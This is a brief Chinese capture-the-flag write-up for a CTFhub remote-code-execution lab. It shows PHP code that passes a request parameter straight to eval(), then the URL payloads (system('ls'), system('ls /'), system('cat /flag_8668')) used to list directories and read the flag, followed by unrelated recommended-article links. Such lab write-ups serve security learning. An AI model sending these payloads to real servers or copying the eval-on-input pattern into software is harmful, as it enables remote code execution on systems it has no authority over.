CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
JosieBook16 分钟前
【Vue】12 Vue技术—— Vue 事件修饰符详解:掌握事件处理的高级技巧
前端·javascript·vue.js
未若君雅裁25 分钟前
SpringAI基础入门
java·spring boot·ai
CC.GG32 分钟前
【C++】用哈希表封装myunordered_map和 myunordered_set
java·c++·散列表
a努力。1 小时前
字节Java面试被问:TCP的BBR拥塞控制算法原理
java·开发语言·python·tcp/ip·elasticsearch·面试·职场和发展
艾斯特_1 小时前
Echarts常用配置项及解释
前端·javascript·echarts
jiaguangqingpanda1 小时前
Day24-20260120
java·开发语言·数据结构
m0_502724951 小时前
飞书真机调试
开发语言·前端·javascript
一个龙的传说1 小时前
xshell下载
java
C雨后彩虹2 小时前
羊、狼、农夫过河
java·数据结构·算法·华为·面试
java资料站2 小时前
SpringAI+DeepSeek大模型应用开发实战
java